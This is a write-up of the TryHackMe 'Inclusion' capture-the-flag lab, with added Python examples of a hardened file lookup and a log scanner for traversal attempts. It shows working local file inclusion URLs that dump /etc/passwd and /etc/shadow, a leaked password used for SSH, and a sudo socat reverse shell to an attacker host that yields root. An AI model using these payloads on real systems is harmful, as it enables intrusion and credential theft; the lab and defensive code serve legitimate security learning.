TryHackMe - Inclusion

A beginner level LFI challenge

What are we doing?

LFI stands for "Local File Inclusion": an application is made to read (or include) a file on its own filesystem that it was never meant to expose. This often happens when the user controls some or all of a path the application builds. For this challenge, clicking the links on the example blog shows that the user controls a query parameter called name. If we set name to any path we like (guessing that the blog's content is pulled in from certain "approved" local files), then perhaps we can get some information to work with.
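To make the mechanism concrete, here is an added Python example (not the challenge's own code) of the article lookup such a blog might perform, written first the vulnerable way and then hardened. The function and directory names are assumptions; the "approved articles" directory and its single post are constructed on the fly so the code runs offline.

```python
"""
Added example, not the challenge's own code: an /article?name=... lookup
written the vulnerable way (resolve_unsafe) and the hardened way
(resolve_safe). All names here are assumed for illustration.
"""
import os
import re
import tempfile
from pathlib import Path
from typing import Optional

# Constructed sample: a throw-away "approved articles" directory with one post.
ARTICLES_DIR = Path(tempfile.mkdtemp(prefix="articles-")).resolve()
(ARTICLES_DIR / "lfiattack").write_text("Sample article body.\n")

# Allowlist for the shape of a name: no '/', no '.', not empty.
ARTICLE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def resolve_unsafe(name: str) -> Path:
    """Vulnerable pattern: the request parameter is joined onto the base
    directory and used as-is. '../../../../../etc/passwd' walks out of the
    base, and an absolute name makes os.path.join discard the base entirely."""
    return Path(os.path.join(ARTICLES_DIR, name))


def is_contained(path: Path) -> bool:
    """True only if the canonical (symlink-resolved) path lies under ARTICLES_DIR."""
    try:
        path.resolve().relative_to(ARTICLES_DIR)
        return True
    except ValueError:
        return False


def resolve_safe(name: str) -> Optional[Path]:
    """Hardened lookup with two independent checks: the allowlist on the
    name's shape, then containment of the canonical path. Either alone
    stops the traversal payload; keeping both means a loosened regex later
    does not silently reopen the hole."""
    if not ARTICLE_NAME.fullmatch(name):
        return None
    candidate = (ARTICLES_DIR / name).resolve()
    if candidate.parent != ARTICLES_DIR or not is_contained(candidate):
        return None
    if not candidate.is_file():
        return None
    return candidate


def read_article(name: str) -> Optional[str]:
    """What the handler should do: serve approved files only, None otherwise."""
    path = resolve_safe(name)
    return path.read_text() if path is not None else None


if __name__ == "__main__":
    payload = "../../../../../etc/passwd"
    print("unsafe ->", resolve_unsafe(payload).resolve())
    print("safe   ->", resolve_safe(payload))
    print("article:", read_article("lfiattack").strip())
```

The containment check matters even with the regex in place: it is the check that survives when someone later decides article names may contain dots or subdirectories, and because it runs after resolve() it also rejects a symlink planted inside the articles directory that points elsewhere.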

http://**.**.***.**/article?name=../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash #falconfeast:rootpassword
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false

http://**.**.***.**/article?name=../../../../../etc/shadow

daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:18281:0:99999:7:::
uuidd:*:18281:0:99999:7:::
dnsmasq:*:18281:0:99999:7:::
landscape:*:18281:0:99999:7:::
pollinate:*:18281:0:99999:7:::
falconfeast:$6$dYJsdbeD$rlYGlx24kUUcSHTc0dMutxEesIAUA3d8nQeTt6FblVffELe3FxLE3gOID5nLxpHoycQ9mfSC.TNxLxet9BN5c/:18281:0:99999:7:::
sshd:*:18281:0:99999:7:::
mysql:!:18281:0:99999:7:::

If nothing else, we got some user names. So while we set John the Ripper to work on that shadow file, let's take a stab in the dark:

http://**.**.*.***/article?name=../../../../home/falconfeast/user.txt

********************

It looks like the intuition, based on how CTFs like this one are constructed, gets us an easy flag for the user. But I can't help but think there is a less lucky way to get the flag. We certainly have performed local file inclusion by exploiting the fact that there is no sanitization on the input URL or protections against accessing pretty much anywhere we want to (at least wherever the UID of the web server is allowed), so maybe that's all there is to it.
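Every one of those requests lands in the web server's access log, so a defender's counterpart to the traversal above is spotting it there. The following is an added Python example (not part of the write-up) that parses constructed Apache-style log lines, decodes each query parameter, and flags values that step to a parent directory or start from the filesystem root; the IPs and timestamps are made up, and the function names are assumptions.

```python
"""
Added example, not from the write-up: flag directory-traversal attempts in
query parameters, run over constructed combined-format access log lines.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log with placeholder IPs. Lines 2-4 mirror the requests
# the write-up makes (the third as a client would send it with the slashes
# URL-encoded); lines 1 and 5 are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jan/2020:10:01:12 +0000] "GET /article?name=lfiattack HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [22/Jan/2020:10:02:30 +0000] "GET /article?name=../../../../../etc/passwd HTTP/1.1" 200 2200 "-" "curl/7.68.0"
10.0.0.9 - - [22/Jan/2020:10:02:41 +0000] "GET /article?name=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 1800 "-" "curl/7.68.0"
10.0.0.9 - - [22/Jan/2020:10:03:05 +0000] "GET /article?name=../../../../home/falconfeast/user.txt HTTP/1.1" 200 64 "-" "curl/7.68.0"
10.0.0.7 - - [22/Jan/2020:10:04:00 +0000] "GET /static/style.css HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# A path component that steps to the parent directory (after normalising
# backslashes to slashes).
PARENT_STEP = re.compile(r'(^|/)\.\.(/|$)')


def suspicious_value(raw: str) -> bool:
    """parse_qsl already decoded one layer; unquote again so a doubly
    encoded value is judged on what the filesystem would finally see."""
    value = unquote(raw).replace("\\", "/")
    return bool(PARENT_STEP.search(value)) or value.startswith("/")


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious (parameter, value) pair. 'served'
    records whether the app answered 200, i.e. the file was actually
    returned rather than blocked."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for key, raw in parse_qsl(query, keep_blank_values=True):
            if suspicious_value(raw):
                findings.append({
                    "ip": m["ip"],
                    "time": m["ts"],
                    "param": key,
                    "value": unquote(raw),
                    "status": m["status"],
                    "served": m["status"] == "200",
                })
    return findings


def by_source(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Count findings per client address: one traversal may be a typo,
    a burst from one address is reconnaissance."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["ip"], h["param"], "=", h["value"], "served" if h["served"] else "blocked")
    print(by_source(hits))
```

The "served" flag is the part worth alerting on: a traversal attempt that got a 4xx is noise, one that got a 200 with a plausible body size means the file left the server and the host should be treated as compromised.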

But wait

Ah, well... there is another way and it's staring us in the face in the passwd file. The comment after the account named falconfeast shows what might be the plaintext password. Why someone would put a comment in there spelling out the password is hard to imagine, but nonetheless we have it, and we know it works because now we can ssh into the box:

falconfeast@inclusion:~$ id
uid=1000(falconfeast) gid=1000(falconfeast) groups=1000(falconfeast),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)

I guess we can kill that John the Ripper job 😀

What can this user do?

falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat

This user can run socat as root, so we can use it to set up a reverse shell, which should then give us access to the root user's files.

RHOST=**.*.**.***
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
kali@kali:~$ socat file:`tty`,raw,echo=0 tcp-listen:12345
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(falconfeast) gid=1000(falconfeast) groups=1000(falconfeast),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
$ 
kali@kali:~$ socat file:`tty`,raw,echo=0 tcp-listen:12345
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -la
total 48
drwx------  5 root root 4096 Jan 22  2020 .
drwxr-xr-x 23 root root 4096 Jan 20  2020 ..
-rw-------  1 root root 5555 Jan 23  2020 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  3 root root 4096 Jan 21  2020 .cache
drwx------  3 root root 4096 Jan 20  2020 .gnupg
-rw-------  1 root root   28 Jan 20  2020 .lesshst
drwxr-xr-x  3 root root 4096 Jan 20  2020 .local
-rw-------  1 root root  158 Jan 21  2020 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root    0 Jan 21  2020 .python_history
-rw-r--r--  1 root root   21 Jan 22  2020 root.txt
# cat root.txt
********************
# 

Completed!